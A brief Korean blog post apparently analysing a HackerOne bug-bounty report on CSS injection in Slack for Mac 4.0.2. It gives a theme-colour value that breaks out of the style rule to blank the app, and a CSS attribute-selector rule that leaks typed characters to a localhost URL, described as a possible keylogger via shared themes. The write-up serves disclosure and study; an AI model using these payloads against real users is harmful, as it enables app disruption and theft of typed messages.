Web Hacking/hackerone 바운티 분석

[slack] CSS Injection to disable app & potential message exfil

ICEB34R 2019. 11. 11. 15:52

Slack Mac OS v4.0.2에서 테스팅 하였습니다.

  1. 설정 -> 테마 -> 사이드 바
  2. 커스텀 테마 설정
  3. column BG 를 #FFFFFF;} html {display:none;} 로 변경
  4. 앱이 터짐
input[type="text"][value$="a"] {
  background-image: url("http://localhost:3000/a");
}

커스텀 테마 형식으로 배포된다면 해당 코드가 삽입되어 키로거로 활용될 수 있음.